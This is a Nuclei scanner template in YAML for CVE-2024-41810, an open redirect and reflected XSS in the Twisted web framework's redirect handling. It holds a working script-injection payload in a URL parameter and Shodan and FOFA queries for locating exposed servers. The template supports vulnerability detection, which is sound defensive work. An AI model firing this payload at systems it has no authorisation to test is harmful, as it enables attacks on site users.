60 lines
1.8 KiB
YAML
60 lines
1.8 KiB
YAML
id: CVE-2024-41810
|
|
|
|
info:
|
|
name: Twisted - Open Redirect & XSS
|
|
author: KoYejune0302,cheoljun99,sim4110,gy741
|
|
severity: medium
|
|
description: |
|
|
Twisted is an event-based framework for internet applications, supporting Python 3.6+. The Twisted web framework's redirectTo function is vulnerable to reflected XSS if an attacker can control the redirect URL. This template tests for an open redirect and XSS vulnerability in the URL parameter. This vulnerability is fixed in 24.7.0rc1.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2024-41810
|
|
cpe: cpe:2.3:a:twistedmatrix:twisted:*:*:*:*:*:*:*:*
|
|
reference:
|
|
- https://github.com/advisories/GHSA-cf56-g6w6-pqq2
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-41810
|
|
metadata:
|
|
max-request: 2
|
|
shodan-query: html:'Twisted' html:"python"
|
|
fofa-query: body="twisted" && "python"
|
|
tags: xss,redirect,twisted,python
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
redirects: true
|
|
matchers:
|
|
- type: word
|
|
part: response
|
|
words:
|
|
- "TWISTED_SESSION"
|
|
- '["Twisted'
|
|
internal: true
|
|
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}?url=ws://example.com/"><script>alert(document.domain)</script>'
|
|
|
|
redirects: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: response
|
|
words:
|
|
- 'Location: ws://example.com/"><script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 302
|
|
# digest: 4b0a00483046022100c86e7f9bfa35e3dc73ebadf54fce8ae64cac87c151913718557b701015117adc022100a20d28cbb4fb88bd17c666fc72de58269474ecd5ea1134ef92218478938a7041:922c64590222798bb761d5b6d8e72950 |